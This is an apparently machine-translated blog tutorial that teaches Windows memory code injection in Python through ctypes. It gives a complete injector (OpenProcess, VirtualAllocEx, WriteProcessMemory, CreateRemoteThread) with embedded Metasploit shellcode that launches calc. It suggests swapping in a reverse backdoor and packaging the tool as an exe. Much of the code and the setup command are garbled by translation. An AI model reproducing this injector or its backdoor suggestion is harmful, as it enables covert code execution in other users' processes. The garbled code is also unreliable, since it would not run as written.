Background
This article is the foundation for getting started, pure science popularization, and great ox mo ~
All the content in this tutorial is for study purposes only. Do not use it for illegal purposes. Otherwise, I cannot help you...
Speaking of injection, the first impression may also habitually remain in SQL injection, script injection (XSS), and so on. Today, light ++ (shou) brings you back to the operating system from the web end, discusses the classic injection-memory injection in Windows, and uses python to compile a simple code injection program.
Common memory injection methods include dll injection and code injection. Dll injection is to inject our own dll into the address space of the target process and execute it in the target process. Dll injection requires another "propeller" program to inject our "parasite" dll "into the target process.
Code injection is the same as dll injection, but the "parasite" code is in the same program as the "propeller" code.
Dll file: windows dynamic link library. In Windows, many applications are not a complete executable file. They are divided into relatively independent dynamic link libraries, that is, DLL files, which are placed in the system. When we execute a program, the corresponding DLL file will be called.
This experiment selects "code injection. Don't talk nonsense. Get started!
Preparations
Write python applets. light recommends the sexy Sublime text2 + JEDI (python auto-completion plug-in ).
First install the "Plugin management" plug-in package control of sublime text2:
After opening sublime, press ctrl + ~" Call the console, paste the following code into the command line, and press enter:
Import urllib2, OS; pf = 'package Control. sublime-package '; ipp = sublime. installed_packages_path (); OS. makedirs (ipp) if not OS. path. exists (ipp) else None; open (OS. path. join (ipp, pf), 'WB '). write (urllib2.urlopen ('http: // sublime.wbond.net/'{pf.replace ('', '% 20 ')). read ())
After the installation is complete, restart sublime text2, enter Ctrl + Shift + P, and then enter Install Package
Enter "jedi" and press enter to install jedi.
The server load balancer does not mistakenly hack into the server. After installing the plug-in, we start to officially renew the code.
Cooking starts
Raw materials: win7, python27, sublime text2, and msfpayload
Essential Skills: windows api basics, python basics, and metasploit basics! Http://zone.wooyun.org/content/17377)
This injection code mainly relies on python's ctypes Library, which allows python to directly call windows APIs, which is very convenient. "Why not use c or c ++ ?", Because I have only one gray hat python book at hand.
#-*-Coding: UTF-8 -*-
# Import the sys Library and the ctypes Library
Import sys
From ctypes import *
PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0 xFFF)
VIRTUAL_MEM = (0x1000 | 0x2000)
Kernel32 = windll. kernel32
Pid = int (sys. argv [1])
If not sys. argv [1]:
Print "Code Injector:./code_injector.py <PID to inject>"
Sys. exit (0)
# Shellcode is generated using msfpayload. Here is a calculator. Of course, you can directly generate a backdoor program # sequence. Generated code: msfpayload windows/exec CMD = calc.exe EXITFUNC = thread C
Shellcode = ("xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30"
"X8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"X31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2"
"Xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85"
"Xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3"
"X3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0d"
"X01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58"
"X8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8b"
"X04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xff"
"Xe0x58x5fx5ax8bx12xebx86x5dx6ax01x8dx85xb9x00"
"X00x00x50x68x31x8bx6fx87xffxd5xbbxaaxc5xe2x5d"
"X68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75"
"X05xbbx47x13x72x6fx6ax00x53xffxd5x63x61x6cx63"
"X2ex65x78x65x00 ")
Code_size = len (shellcode)
# Obtain the process handle to be injected
H_process = kernel32.OpenProcess (PROCESS_ALL_ACCESS, False, int (pid ))
If not h_process:
Print "[*] Couldn't acquire a handle to PID: % s" % pid
Sys. exit (0)
# Apply for memory for our shellcode
Arg_address = kernel32.VirtualAllocEx (h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)
# Write shellcode to the memory
Written = c_int (0)
Kernel32.WriteProcessMemory (h_process, arg_address, shellcode, code_size, byref (written ))
# Create a remote thread and specify the entry as our shellcode header
Thread_id = c_ulong (0)
If not kernel32.CreateRemoteThread (h_process, None, 0, arg_address, None, 0, byref (thread_id )):
Print "[*] Failed to inject shellcode. Exiting ."
Sys. exit (0)
Print "[*] Remote thread successfully created with a thread ID of: 0x % 08x" % thread_id.value
Handle: the difference between a handle and a normal pointer is that the pointer contains the memory address of the referenced object, and the handle is the reference identifier managed by the system, this identifier can be located on a memory address by the system. This indirect object access mode enhances the system's control over referenced objects.
We can see that memory injection is mainly attributed to a key api opened by windows: CreateRemoteThread. This function allows us to create a thread that runs in another process address space (also known as creating a remote thread ).
The entire injection process can be divided into three steps: getting the target process handle, writing shellcode into the memory, and creating a remote thread. This is also the basic principle and mechanism of memory injection.
When using msfpayload to generate shellcode, you need to pay attention to two pitfalls.
Trap 1: msfencode cannot be used when Msfpayload generates the shellcode. Some documents tell us that msfencode-B 'x00' should be added to the shellcode to avoid empty words, but once msfencode is used, by default, the shellcode is coded once by the x86/shikata_ga_nai encoder. Here, we recommend that you use msfpayload xxx C to generate pure shellcode.
Pit2:
Msfpayload windows/exec CMD = calc.exe C
The directly generated shellcode execution result is a host crash of 100%, which is simply a process killer. During the test, I put the Baidu Cloud manager for testing in the dark. This pitfall took a long time to jump out.
Later, the baseline user used ollydbg to debug and found that the shellcode exited and directly exited process, killing the entire process.
With the enthusiastic help of Kiyou, refer to the official msfpayload documentation and then make a decisive decision to change the EXITFUNC value to thread (process by default ):
Test successful!
Finally, we can package the python script into an exe executable file using py2exe. If you are interested, you can add the UI to create a program that can customize different injection types (dll or code injection) and inject code (reverse backdoor or prank program.